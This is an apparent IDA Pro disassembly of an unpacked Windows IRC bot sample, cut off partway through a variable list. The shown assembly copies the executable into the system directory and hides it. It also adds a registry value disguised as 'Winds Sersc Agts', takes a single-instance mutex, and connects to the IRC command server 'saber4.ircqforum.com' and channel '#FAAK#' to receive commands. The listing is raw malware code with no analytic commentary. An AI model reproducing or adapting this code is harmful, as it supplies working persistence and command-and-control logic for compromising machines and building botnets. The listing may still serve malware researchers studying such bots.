;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
; Input MD5 : DFC8D5572AD29A890BEE6F008EF8CBF2
; File Name : u:\work\dfc8d5572ad29a890bee6f008ef8cbf2_unpacked.exe
; Format : Portable executable for 80386 (PE)
; Imagebase : 400000
; Section 1. (virtual address 00001000)
; Virtual size : 000C4000 ( 802816.)
; Section size in file : 000C4000 ( 802816.)
; Offset to raw data for section: 00001000
; Flags E0000080: Bss Executable Readable Writable
; Alignment : default
unicode macro page,string,zero
irpc c,<string>
db '&c', page
endm
ifnb <zero>
dw zero
endif
endm
.686p
.mmx
.model flat
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
UPX0 segment para public 'CODE' use32
assume cs:UPX0
;org 401000h
assume es:nothing, ss:nothing, ds:UPX0, fs:nothing, gs:nothing
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401000 proc near ; CODE XREF: sub_401221+358�p
; sub_41835A+1E�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ebx
push esi
push edi
mov edi, offset dword_429050
xor esi, esi
mov ebx, offset aWindsSerscAgts ; "Winds Sersc Agts"
loc_401013: ; CODE XREF: sub_401000+69�j
lea eax, [ebp+var_4]
push esi
push eax
push esi
push 0F003Fh
push esi
push esi
push esi
push dword ptr [edi+4]
push dword ptr [edi]
call ds:dword_4CB608 ; RegCreateKeyExA
cmp [ebp+arg_0], esi
jz short loc_40104D
push [ebp+arg_0]
call sub_41AFE0
pop ecx
push eax
push [ebp+arg_0]
push 1
push esi
push ebx
push [ebp+var_4]
call ds:dword_4CB678 ; RegSetValueExA
jmp short loc_401057
; ---------------------------------------------------------------------------
loc_40104D: ; CODE XREF: sub_401000+2F�j
push ebx
push [ebp+var_4]
call ds:dword_4CB5B8 ; RegDeleteValueA
loc_401057: ; CODE XREF: sub_401000+4B�j
push [ebp+var_4]
call ds:dword_4CB630 ; RegCloseKey
add edi, 8
cmp edi, offset dword_429068
jb short loc_401013
pop edi
pop esi
pop ebx
leave
retn
sub_401000 endp
; =============== S U B R O U T I N E =======================================
sub_401070 proc near ; CODE XREF: sub_4010AB+56�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_4]
mov edx, [esp+arg_0]
push esi
or esi, 0FFFFFFFFh
test eax, eax
jz short loc_4010A5
push ebx
push edi
lea edi, [eax]
mov ecx, 0FFh
loc_401089: ; CODE XREF: sub_401070+31�j
mov al, [edx]
mov ebx, esi
and eax, ecx
and ebx, ecx
xor eax, ebx
shr esi, 8
mov eax, dword_427238[eax*4]
xor esi, eax
inc edx
dec edi
jnz short loc_401089
pop edi
pop ebx
loc_4010A5: ; CODE XREF: sub_401070+E�j
mov eax, esi
pop esi
not eax
retn
sub_401070 endp
; =============== S U B R O U T I N E =======================================
sub_4010AB proc near ; CODE XREF: sub_4163FA+24A�p
var_10 = dword ptr -10h
arg_0 = dword ptr 4
push ebx
push esi
xor ebx, ebx
push edi
push ebx
call sub_41B4D5
mov [esp+10h+var_10], offset dword_429068
push [esp+10h+arg_0]
mov esi, eax
call sub_41B4C2
mov edi, eax
pop ecx
test edi, edi
pop ecx
jz short loc_4010FA
loc_4010D0: ; CODE XREF: sub_4010AB+4D�j
test byte ptr [edi+0Ch], 10h
jnz short loc_4010FE
inc ebx
push ebx
push esi
call sub_41B202
mov esi, eax
pop ecx
test esi, esi
pop ecx
jz short loc_4010FA
push edi
push 1
lea eax, [esi+ebx-1]
push 1
push eax
call sub_41B11A
add esp, 10h
jmp short loc_4010D0
; ---------------------------------------------------------------------------
loc_4010FA: ; CODE XREF: sub_4010AB+23�j
; sub_4010AB+39�j
xor eax, eax
jmp short loc_401119
; ---------------------------------------------------------------------------
loc_4010FE: ; CODE XREF: sub_4010AB+29�j
dec ebx
push ebx
push esi
call sub_401070
push esi
mov ebx, eax
call sub_41B0B1
push edi
call sub_41B05B
add esp, 10h
mov eax, ebx
loc_401119: ; CODE XREF: sub_4010AB+51�j
pop edi
pop esi
pop ebx
retn
sub_4010AB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40111D proc near ; DATA XREF: sub_401221+14�o
var_268 = dword ptr -268h
var_25C = byte ptr -25Ch
var_158 = byte ptr -158h
var_54 = dword ptr -54h
var_48 = dword ptr -48h
var_28 = dword ptr -28h
var_24 = word ptr -24h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 25Ch
push ebx
push esi
push edi
push dword_43E59C
call ds:dword_4CB6EC ; closesocket
call sub_40B2C0
call ds:dword_4CB5AC ; WSACleanup
call ds:dword_4CB5AC ; WSACleanup
mov ebx, dword_427078
push 64h
call ebx ; Sleep
xor edi, edi
push 10h
lea eax, [ebp+var_10]
push edi
push eax
call sub_41B590
push 44h
lea eax, [ebp+var_54]
pop esi
push esi
push edi
push eax
call sub_41B590
add esp, 18h
mov [ebp+var_54], esi
mov esi, 104h
lea eax, [ebp+var_25C]
push esi
push eax
mov [ebp+var_48], offset byte_43D808
mov [ebp+var_28], 1
mov [ebp+var_24], di
call dword_427074 ; GetSystemDirectoryA
lea eax, [ebp+var_158]
push esi
push eax
push edi
call dword_427070 ; GetModuleFileNameA
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_54]
push eax
lea eax, [ebp+var_25C]
push eax
push edi
push 28h
push 1
push edi
lea eax, [ebp+var_158]
push edi
push eax
push edi
call dword_42706C ; CreateProcessA
test eax, eax
jz short loc_4011E2
push 64h
call ebx ; Sleep
push [ebp+var_10]
mov esi, dword_427068
call esi ; CloseHandle
push [ebp+var_C]
call esi ; CloseHandle
loc_4011E2: ; CODE XREF: sub_40111D+AF�j
mov eax, [ebp+arg_8]
mov dword ptr [eax+0B0h], offset dword_43D800
mov eax, [esp+268h+var_268]
mov large fs:0, eax
add esp, 8
push edi
call dword_427064 ; ExitProcess
pop edi
pop esi
pop ebx
loc_401205: ; DATA XREF: UPX0:00429004�o
jmp $+5
push 0FFFFh
push 539h
call sub_418685
pop ecx
mov ds:dword_4CB390, eax
pop ecx
retn
sub_40111D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401221 proc near ; CODE XREF: UPX0:0041D9FC�p
var_988 = byte ptr -988h
var_884 = byte ptr -884h
var_883 = byte ptr -883h
var_6F4 = byte ptr -6F4h
var_5F4 = byte ptr -5F4h
var_4F0 = byte ptr -4F0h
var_3F0 = byte ptr -3F0h
var_2EC = byte ptr -2ECh
var_1E8 = byte ptr -1E8h
var_E4 = dword ptr -0E4h
var_D8 = dword ptr -0D8h
var_B8 = dword ptr -0B8h
var_B4 = word ptr -0B4h
var_A0 = byte ptr -0A0h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 988h
push ebx
xor ebx, ebx
push esi
push edi
mov [ebp+var_8], ebx
mov [ebp+var_C], ebx
mov [ebp+var_4], offset sub_40111D
push [ebp+var_4]
push large dword ptr fs:0
mov large fs:0, esp
mov esi, dword_4270A8
call esi ; GetTickCount
xor edx, edx
mov ecx, 3E8h
div ecx
mov ds:dword_4CB394, eax
call esi ; GetTickCount
push eax
call sub_41B8D8
pop ecx
call sub_409B13
push 2
call ds:dword_4CB700 ; SetErrorMode
push 7530h
push offset aQufpoius ; "qufpoius"
push ebx
push ebx
call dword_4270A4 ; CreateMutexA
push eax
call dword_4270A0 ; WaitForSingleObject
cmp eax, 102h
jnz short loc_4012A1
push 1
call dword_427064 ; ExitProcess
loc_4012A1: ; CODE XREF: sub_401221+76�j
lea eax, [ebp+var_884]
push eax
push 202h
call ds:dword_4CB5C4 ; WSAStartup
cmp eax, ebx
jnz loc_4017E4
cmp [ebp+var_884], 2
jnz loc_4017DE
xor eax, eax
mov al, [ebp+var_883]
cmp al, 2
jnz loc_4017DE
mov esi, 104h
lea eax, [ebp+var_3F0]
push esi
push eax
call dword_427074 ; GetSystemDirectoryA
lea eax, [ebp+var_2EC]
push esi
push eax
push ebx
call dword_42709C ; GetModuleHandleA
push eax
call dword_427070 ; GetModuleFileNameA
lea eax, [ebp+var_4F0]
push eax
lea eax, [ebp+var_6F4]
push eax
push ebx
lea eax, [ebp+var_2EC]
push ebx
push eax
call sub_41B9D1
add esp, 14h
lea eax, [ebp+var_4F0]
push eax
lea eax, [ebp+var_6F4]
push eax
push offset dword_429AD0
lea eax, [ebp+var_5F4]
push esi
push eax
call sub_41B980
lea eax, [ebp+var_3F0]
push eax
lea eax, [ebp+var_2EC]
push eax
call sub_41B900
add esp, 1Ch
test eax, eax
jnz loc_401516
cmp dword_42908C, ebx
mov esi, offset byte_429110
jz short loc_40139C
push esi
xor edi, edi
call sub_41AFE0
sub eax, 4
pop ecx
jz short loc_40139C
loc_401379: ; CODE XREF: sub_401221+179�j
call sub_41B8E2
push 1Ah
cdq
pop ecx
idiv ecx
push esi
add dl, 61h
mov byte_429110[edi], dl
inc edi
call sub_41AFE0
sub eax, 4
pop ecx
cmp edi, eax
jb short loc_401379
loc_40139C: ; CODE XREF: sub_401221+148�j
; sub_401221+156�j
lea eax, [ebp+var_3F0]
push esi
push eax
lea eax, [ebp+var_1E8]
push offset dword_429AC8
push eax
call sub_41B886
add esp, 10h
lea eax, [ebp+var_1E8]
push eax
call dword_427098 ; GetFileAttributesA
cmp eax, 0FFFFFFFFh
jz short loc_4013DC
lea eax, [ebp+var_1E8]
push 80h
push eax
call dword_427094 ; SetFileAttributesA
loc_4013DC: ; CODE XREF: sub_401221+1A7�j
mov esi, dword_427090
lea eax, [ebp+var_1E8]
push ebx
push eax
lea eax, [ebp+var_2EC]
xor edi, edi
push eax
loc_4013F3: ; CODE XREF: sub_401221+209�j
call esi ; CopyFileA
test eax, eax
jnz short loc_40142C
call dword_42708C ; RtlGetLastWin32Error
cmp edi, ebx
jnz short loc_40142C
cmp eax, 20h
jz short loc_40140D
cmp eax, 5
jnz short loc_40142C
loc_40140D: ; CODE XREF: sub_401221+1E5�j
push 1
pop edi
push 3A98h
call dword_427078 ; Sleep
lea eax, [ebp+var_1E8]
push ebx
push eax
lea eax, [ebp+var_2EC]
push eax
jmp short loc_4013F3
; ---------------------------------------------------------------------------
loc_40142C: ; CODE XREF: sub_401221+1D6�j
; sub_401221+1E0�j ...
lea eax, [ebp+var_1E8]
push eax
call sub_418294
pop ecx
lea eax, [ebp+var_1E8]
push 7
push eax
call dword_427094 ; SetFileAttributesA
push 10h
lea eax, [ebp+var_20]
push ebx
push eax
call sub_41B590
push 44h
lea eax, [ebp+var_E4]
pop esi
push esi
push ebx
push eax
call sub_41B590
add esp, 18h
mov [ebp+var_E4], esi
mov [ebp+var_D8], offset byte_43D808
mov [ebp+var_B4], bx
push 1
pop esi
mov [ebp+var_B8], esi
call dword_427088 ; GetCurrentProcessId
push eax
push esi
push 100000h
call dword_427084 ; OpenProcess
lea ecx, [ebp+var_2EC]
push ecx
push eax
lea eax, [ebp+var_1E8]
push eax
lea eax, [ebp+var_988]
push offset dword_429ABC
push eax
call sub_41B886
add esp, 14h
lea eax, [ebp+var_20]
push eax
lea eax, [ebp+var_E4]
push eax
lea eax, [ebp+var_3F0]
push eax
push ebx
push 28h
push esi
push ebx
lea eax, [ebp+var_988]
push ebx
push eax
lea eax, [ebp+var_1E8]
push eax
call dword_42706C ; CreateProcessA
test eax, eax
jz short loc_401516
push 0C8h
call dword_427078 ; Sleep
push [ebp+var_20]
mov esi, dword_427068
call esi ; CloseHandle
push [ebp+var_1C]
call esi ; CloseHandle
call ds:dword_4CB5AC ; WSACleanup
push ebx
call dword_427064 ; ExitProcess
loc_401516: ; CODE XREF: sub_401221+137�j
; sub_401221+2CB�j
cmp ds:dword_4DB974, 2
jle short loc_401562
mov eax, ds:dword_4DB978
push dword ptr [eax+4]
call sub_41B779
pop ecx
mov esi, eax
push 0FFFFFFFFh
push esi
call dword_4270A0 ; WaitForSingleObject
push esi
call dword_427068 ; CloseHandle
mov eax, ds:dword_4DB978
cmp [eax+8], ebx
jz short loc_401562
push 7D0h
call dword_427078 ; Sleep
mov eax, ds:dword_4DB978
push dword ptr [eax+8]
call dword_427080 ; DeleteFileA
loc_401562: ; CODE XREF: sub_401221+2FC�j
; sub_401221+326�j
cmp dword_429090, ebx
jz short loc_40157F
cmp ds:dword_4CB724, ebx
jnz short loc_40157F
lea eax, [ebp+var_5F4]
push eax
call sub_401000
pop ecx
loc_40157F: ; CODE XREF: sub_401221+347�j
; sub_401221+34F�j
lea eax, [ebp+var_A0]
push offset dword_429AA0
push eax
call sub_41B886
push ebx
lea eax, [ebp+var_A0]
push ebx
push eax
call sub_40B0F7
lea eax, [ebp+var_A0]
push eax
call sub_4151AD
push 0B80h
push ebx
push offset dword_43D810
call sub_41B590
add esp, 24h
lea eax, [ebp+var_A0]
push offset unk_429A7C
push eax
call sub_41B886
push ebx
lea eax, [ebp+var_A0]
push 1
push eax
call sub_40B0F7
add esp, 14h
mov esi, eax
mov edi, dword_42707C
lea eax, [ebp+var_8]
push eax
push ebx
push ebx
push offset sub_419A01
push ebx
push ebx
call edi ; CreateThread
imul esi, 234h
cmp eax, ebx
mov dword_43E5A4[esi], eax
jnz short loc_401622
call dword_42708C ; RtlGetLastWin32Error
push eax
lea eax, [ebp+var_A0]
push offset unk_429A3C
push eax
call sub_41B886
add esp, 0Ch
loc_401622: ; CODE XREF: sub_401221+3E4�j
lea eax, [ebp+var_A0]
push eax
call sub_4151AD
push 2
call sub_40B33F
pop ecx
test eax, eax
pop ecx
jnz short loc_4016A7
lea eax, [ebp+var_A0]
push offset dword_429A10
push eax
call sub_41B886
push ebx
lea eax, [ebp+var_A0]
push 2
push eax
call sub_40B0F7
add esp, 14h
mov esi, eax
lea eax, [ebp+var_8]
push eax
push ebx
push esi
push offset sub_4101FD
push ebx
push ebx
call edi ; CreateThread
imul esi, 234h
cmp eax, ebx
mov dword_43E5A4[esi], eax
jnz short loc_40169A
call dword_42708C ; RtlGetLastWin32Error
push eax
lea eax, [ebp+var_A0]
push offset dword_4299DC
push eax
call sub_41B886
add esp, 0Ch
loc_40169A: ; CODE XREF: sub_401221+45C�j
lea eax, [ebp+var_A0]
push eax
call sub_4151AD
pop ecx
loc_4016A7: ; CODE XREF: sub_401221+418�j
call sub_41B8E2
push 7Fh
and eax, 3
push offset aSaber4_ircqfor ; "saber4.ircqforum.com"
push offset dword_4CB39C
mov ds:dword_4CB508, eax
call sub_41B5F0
mov eax, dword_42906C
push 3Fh
mov edi, offset dword_4CB41C
push offset aFaak ; "#FAAK#"
push edi
mov ds:dword_4CB4EC, eax
call sub_41B5F0
push 3Fh
mov esi, offset dword_4CB45C
push offset aSaad_ ; "saad."
push esi
call sub_41B5F0
add esp, 24h
mov ds:dword_4CB4F0, ebx
loc_4016FC: ; CODE XREF: sub_401221+563�j
; sub_401221+56E�j ...
mov [ebp+var_4], ebx
loc_4016FF: ; CODE XREF: sub_401221+517�j
push offset dword_4CB398
mov ds:dword_4CB504, ebx
call sub_4017ED
cmp eax, 2
mov [ebp+var_10], eax
jz loc_4017D9
cmp ds:dword_4CB504, ebx
jz short loc_401726
dec [ebp+var_4]
loc_401726: ; CODE XREF: sub_401221+500�j
push 0BB8h
call dword_427078 ; Sleep
inc [ebp+var_4]
cmp [ebp+var_4], 6
jl short loc_4016FF
cmp [ebp+var_10], 2
jz loc_4017D9
cmp [ebp+var_C], ebx
jz short loc_401789
push 7Fh
push offset aSaber4_ircqfor ; "saber4.ircqforum.com"
push offset dword_4CB39C
call sub_41B5F0
mov eax, dword_42906C
push 3Fh
push offset aFaak ; "#FAAK#"
push edi
mov ds:dword_4CB4EC, eax
call sub_41B5F0
push 3Fh
push offset aSaad_ ; "saad."
push esi
call sub_41B5F0
add esp, 24h
mov [ebp+var_C], ebx
jmp loc_4016FC
; ---------------------------------------------------------------------------
loc_401789: ; CODE XREF: sub_401221+526�j
cmp byte_4290EC, bl
jz loc_4016FC
push 7Fh
push offset byte_4290EC
push offset dword_4CB39C
call sub_41B5F0
mov eax, dword_429070
push 3Fh
push offset aFaak_0 ; "#FAAK#"
push edi
mov ds:dword_4CB4EC, eax
call sub_41B5F0
push 3Fh
push offset aSaad__0 ; "saad."
push esi
call sub_41B5F0
add esp, 24h
mov [ebp+var_C], 1
jmp loc_4016FC
; ---------------------------------------------------------------------------
loc_4017D9: ; CODE XREF: sub_401221+4F4�j
; sub_401221+51D�j
call sub_40B2C0
loc_4017DE: ; CODE XREF: sub_401221+A1�j
; sub_401221+B1�j
call ds:dword_4CB5AC ; WSACleanup
loc_4017E4: ; CODE XREF: sub_401221+94�j
pop edi
pop esi
xor eax, eax
pop ebx
leave
retn 10h
sub_401221 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4017ED proc near ; CODE XREF: sub_401221+4E9�p
; DATA XREF: sub_401ACD+662B�o
var_190 = dword ptr -190h
var_18C = byte ptr -18Ch
var_10C = byte ptr -10Ch
var_CC = byte ptr -0CCh
var_8C = byte ptr -8Ch
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_2C = byte ptr -2Ch
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 190h
mov eax, [ebp+arg_0]
push esi
push edi
push 59h
pop ecx
mov esi, eax
lea edi, [ebp+var_190]
rep movsd
mov dword ptr [eax+160h], 1
loc_401812: ; CODE XREF: sub_4017ED+E6�j
; sub_4017ED+136�j ...
push 10h
lea eax, [ebp+var_10]
push 0
push eax
call sub_41B590
add esp, 0Ch
mov [ebp+var_10], 2
push [ebp+var_3C]
call ds:dword_4CB654 ; htons
mov [ebp+var_E], ax
lea eax, [ebp+var_18C]
push eax
call sub_40AAFA
test eax, eax
pop ecx
mov [ebp+var_C], eax
jz loc_40193F
push 1Ch
lea eax, [ebp+var_2C]
push 0
push eax
call sub_41B590
push 0
lea eax, [ebp+var_2C]
push dword_4290A0
push dword_42909C
push eax
call sub_40B08E
mov edi, eax
mov eax, [ebp+var_34]
imul eax, 234h
push 1Bh
add eax, offset byte_43E5A8
push edi
push eax
call sub_41B5F0
add esp, 28h
push 6
push 1
push 2
call ds:dword_4CB6D4 ; socket
mov esi, eax
mov eax, [ebp+var_34]
imul eax, 234h
push 10h
mov dword_43E59C[eax], esi
lea eax, [ebp+var_10]
push eax
push esi
call ds:dword_4CB5FC ; connect
cmp eax, 0FFFFFFFFh
jnz short loc_4018D8
push esi
call ds:dword_4CB6EC ; closesocket
call sub_40AB23
push 7D0h
loc_4018CD: ; CODE XREF: sub_4017ED+146�j
call dword_427078 ; Sleep
jmp loc_401812
; ---------------------------------------------------------------------------
loc_4018D8: ; CODE XREF: sub_4017ED+CD�j
lea eax, [ebp+var_18C]
push eax
push offset unk_429AD8
call sub_415221
push [ebp+var_38]
lea eax, [ebp+var_18C]
push eax
lea eax, [ebp+var_8C]
push eax
lea eax, [ebp+var_CC]
push [ebp+var_190]
push edi
push eax
lea eax, [ebp+var_10C]
push eax
push esi
call sub_401955
add esp, 28h
mov edi, eax
push esi
call ds:dword_4CB6EC ; closesocket
test edi, edi
jz loc_401812
cmp edi, 1
jnz short loc_401935
push 0DBBA0h
jmp short loc_4018CD
; ---------------------------------------------------------------------------
loc_401935: ; CODE XREF: sub_4017ED+13F�j
cmp edi, 2
jz short loc_401943
jmp loc_401812
; ---------------------------------------------------------------------------
loc_40193F: ; CODE XREF: sub_4017ED+5A�j
xor eax, eax
jmp short loc_40194F
; ---------------------------------------------------------------------------
loc_401943: ; CODE XREF: sub_4017ED+14B�j
push [ebp+var_34]
call sub_40B413
pop ecx
push 2
pop eax
loc_40194F: ; CODE XREF: sub_4017ED+154�j
pop edi
pop esi
leave
retn 4
sub_4017ED endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401955 proc near ; CODE XREF: sub_4017ED+123�p
var_1A90 = byte ptr -1A90h
var_A90 = byte ptr -0A90h
var_2C0 = byte ptr -2C0h
var_140 = byte ptr -140h
var_A0 = byte ptr -0A0h
var_20 = byte ptr -20h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
push ebp
mov ebp, esp
mov eax, 1A90h
call sub_41BB20
push ebx
push esi
push edi
xor ebx, ebx
push 3
mov [ebp+var_8], ebx
lea eax, [ebp+var_2C0]
pop ecx
loc_401973: ; CODE XREF: sub_401955+26�j
mov [eax], bl
add eax, 80h
dec ecx
jnz short loc_401973
cmp ds:byte_4CB500, bl
jz short loc_40199A
push offset byte_4CB500
push offset aPassS ; "PASS %s\r\n"
push [ebp+arg_0]
call sub_409A2D
add esp, 0Ch
loc_40199A: ; CODE XREF: sub_401955+2E�j
push [ebp+arg_C]
lea eax, [ebp+var_20]
push ebx
push ebx
push 2
push eax
call sub_40B08E
add esp, 10h
push eax
lea eax, [ebp+var_A0]
push [ebp+arg_C]
push offset aNickSUserS00S ; "NICK %s\r\nUSER %s 0 0 :%s\r\n"
push eax
call sub_41B886
add esp, 14h
lea eax, [ebp+var_A0]
push ebx
push eax
call sub_41AFE0
pop ecx
push eax
lea eax, [ebp+var_A0]
push eax
push [ebp+arg_0]
call ds:dword_4CB6A4 ; send
cmp eax, 0FFFFFFFFh
jnz short loc_401A04
push [ebp+arg_0]
call ds:dword_4CB6EC ; closesocket
push 1388h
call dword_427078 ; Sleep
loc_4019FD: ; CODE XREF: sub_401955+D9�j
; sub_401955+153�j
xor eax, eax
loc_4019FF: ; CODE XREF: sub_401955+173�j
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_401A04: ; CODE XREF: sub_401955+92�j
; sub_401955+F8�j ...
mov esi, 1000h
lea eax, [ebp+var_1A90]
push esi
push ebx
push eax
call sub_41B590
add esp, 0Ch
lea eax, [ebp+var_1A90]
push ebx
push esi
push eax
push [ebp+arg_0]
call ds:dword_4CB66C ; recv
test eax, eax
jle short loc_4019FD
lea eax, [ebp+var_A90]
push eax
lea eax, [ebp+var_1A90]
push eax
call sub_417F80
pop ecx
cmp eax, ebx
pop ecx
mov [ebp+var_C], eax
mov [ebp+var_4], ebx
jle short loc_401A04
lea edi, [ebp+var_A90]
loc_401A55: ; CODE XREF: sub_401955+165�j
push 1
pop esi
loc_401A58: ; CODE XREF: sub_401955+144�j
push [ebp+arg_1C]
lea eax, [ebp+var_8]
push esi
push eax
lea eax, [ebp+var_140]
push eax
lea eax, [ebp+var_2C0]
push eax
push [ebp+arg_18]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
push dword ptr [edi]
call sub_401ACD
add esp, 2Ch
dec eax
mov esi, eax
cmp esi, ebx
jle short loc_401A9B
push 7D0h
call dword_427078 ; Sleep
jmp short loc_401A58
; ---------------------------------------------------------------------------
loc_401A9B: ; CODE XREF: sub_401955+137�j
cmp esi, 0FFFFFFFDh
jz short loc_401AC5
cmp esi, 0FFFFFFFEh
jz short loc_401AC1
cmp esi, 0FFFFFFFFh
jz loc_4019FD
inc [ebp+var_4]
add edi, 4
mov eax, [ebp+var_4]
cmp eax, [ebp+var_C]
jl short loc_401A55
jmp loc_401A04
; ---------------------------------------------------------------------------
loc_401AC1: ; CODE XREF: sub_401955+14E�j
push 1
jmp short loc_401AC7
; ---------------------------------------------------------------------------
loc_401AC5: ; CODE XREF: sub_401955+149�j
push 2
loc_401AC7: ; CODE XREF: sub_401955+16E�j
pop eax
jmp loc_4019FF
sub_401955 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401ACD proc near ; CODE XREF: sub_401955+12A�p
var_5D88 = byte ptr -5D88h
var_5988 = byte ptr -5988h
var_5588 = byte ptr -5588h
var_53F8 = byte ptr -53F8h
var_51F8 = byte ptr -51F8h
var_50F4 = byte ptr -50F4h
var_4FF4 = byte ptr -4FF4h
var_4EF0 = byte ptr -4EF0h
var_4DF0 = byte ptr -4DF0h
var_4CF0 = byte ptr -4CF0h
var_4BF0 = byte ptr -4BF0h
var_4AF0 = byte ptr -4AF0h
var_48F0 = byte ptr -48F0h
var_47EC = byte ptr -47ECh
var_46EC = byte ptr -46ECh
var_45EC = byte ptr -45ECh
var_4588 = byte ptr -4588h
var_4488 = byte ptr -4488h
var_4288 = byte ptr -4288h
var_4188 = byte ptr -4188h
var_4088 = byte ptr -4088h
var_3F88 = dword ptr -3F88h
var_3F84 = byte ptr -3F84h
var_3F04 = byte ptr -3F04h
var_3E00 = byte ptr -3E00h
var_3CFC = dword ptr -3CFCh
var_3CF8 = dword ptr -3CF8h
var_3CF4 = dword ptr -3CF4h
var_3CF0 = dword ptr -3CF0h
var_3CEC = dword ptr -3CECh
var_3CE8 = dword ptr -3CE8h
var_3CE4 = byte ptr -3CE4h
var_3C64 = byte ptr -3C64h
var_3BE4 = byte ptr -3BE4h
var_3B64 = byte ptr -3B64h
var_3AE4 = byte ptr -3AE4h
var_3A64 = dword ptr -3A64h
var_3A60 = dword ptr -3A60h
var_3A5C = dword ptr -3A5Ch
var_3A58 = dword ptr -3A58h
var_3A54 = byte ptr -3A54h
var_37CD = byte ptr -37CDh
var_37CC = byte ptr -37CCh
var_36C8 = dword ptr -36C8h
var_36C0 = dword ptr -36C0h
var_36BC = dword ptr -36BCh
var_36B8 = dword ptr -36B8h
var_36B4 = dword ptr -36B4h
var_36AC = dword ptr -36ACh
var_36A8 = dword ptr -36A8h
var_36A4 = byte ptr -36A4h
var_3624 = byte ptr -3624h
var_35A4 = byte ptr -35A4h
var_3524 = byte ptr -3524h
var_34A4 = dword ptr -34A4h
var_34A0 = dword ptr -34A0h
var_349C = dword ptr -349Ch
var_3498 = dword ptr -3498h
var_3494 = dword ptr -3494h
var_3490 = byte ptr -3490h
var_3410 = byte ptr -3410h
var_3390 = byte ptr -3390h
var_3310 = byte ptr -3310h
var_3290 = dword ptr -3290h
var_328C = dword ptr -328Ch
var_3288 = dword ptr -3288h
var_3284 = dword ptr -3284h
var_3280 = dword ptr -3280h
var_327C = byte ptr -327Ch
var_31FC = byte ptr -31FCh
var_317C = byte ptr -317Ch
var_30FC = byte ptr -30FCh
var_307C = dword ptr -307Ch
var_3078 = dword ptr -3078h
var_3074 = dword ptr -3074h
var_3070 = dword ptr -3070h
var_306C = dword ptr -306Ch
var_3068 = byte ptr -3068h
var_2FE8 = byte ptr -2FE8h
var_2F68 = byte ptr -2F68h
var_2EE8 = byte ptr -2EE8h
var_2E68 = dword ptr -2E68h
var_2E64 = dword ptr -2E64h
var_2E60 = dword ptr -2E60h
var_2E5C = dword ptr -2E5Ch
var_2E58 = byte ptr -2E58h
var_2D54 = dword ptr -2D54h
var_2D50 = byte ptr -2D50h
var_2C4C = byte ptr -2C4Ch
var_2B48 = dword ptr -2B48h
var_2B44 = dword ptr -2B44h
var_2B40 = dword ptr -2B40h
var_2B3C = byte ptr -2B3Ch
var_2ABC = dword ptr -2ABCh
var_2AB8 = dword ptr -2AB8h
var_2AB4 = dword ptr -2AB4h
var_2AB0 = dword ptr -2AB0h
var_2AA8 = byte ptr -2AA8h
var_2990 = byte ptr -2990h
var_2910 = dword ptr -2910h
var_290C = dword ptr -290Ch
var_2908 = dword ptr -2908h
var_2904 = dword ptr -2904h
var_2900 = dword ptr -2900h
var_28FC = dword ptr -28FCh
var_28F8 = byte ptr -28F8h
var_2878 = byte ptr -2878h
var_2778 = byte ptr -2778h
var_2678 = dword ptr -2678h
var_2674 = dword ptr -2674h
var_2670 = dword ptr -2670h
var_266C = dword ptr -266Ch
var_2668 = dword ptr -2668h
var_2664 = dword ptr -2664h
var_2660 = dword ptr -2660h
var_265C = dword ptr -265Ch
var_2658 = dword ptr -2658h
var_2654 = dword ptr -2654h
var_2650 = byte ptr -2650h
var_25D0 = byte ptr -25D0h
var_24D0 = byte ptr -24D0h
var_23D0 = dword ptr -23D0h
var_23CC = dword ptr -23CCh
var_23C8 = dword ptr -23C8h
var_23C4 = dword ptr -23C4h
var_23C0 = dword ptr -23C0h
var_23BC = dword ptr -23BCh
var_23B8 = dword ptr -23B8h
var_23B4 = dword ptr -23B4h
var_23B0 = dword ptr -23B0h
var_23AC = dword ptr -23ACh
var_23A8 = byte ptr -23A8h
var_2328 = byte ptr -2328h
var_22A8 = byte ptr -22A8h
var_2228 = dword ptr -2228h
var_2224 = dword ptr -2224h
var_2220 = dword ptr -2220h
var_221C = dword ptr -221Ch
var_2218 = dword ptr -2218h
var_2214 = byte ptr -2214h
var_2194 = byte ptr -2194h
var_2114 = byte ptr -2114h
var_2094 = dword ptr -2094h
var_2090 = dword ptr -2090h
var_208C = dword ptr -208Ch
var_2088 = dword ptr -2088h
var_2084 = dword ptr -2084h
var_2080 = byte ptr -2080h
var_2000 = byte ptr -2000h
var_1F80 = byte ptr -1F80h
var_1F00 = dword ptr -1F00h
var_1EFC = dword ptr -1EFCh
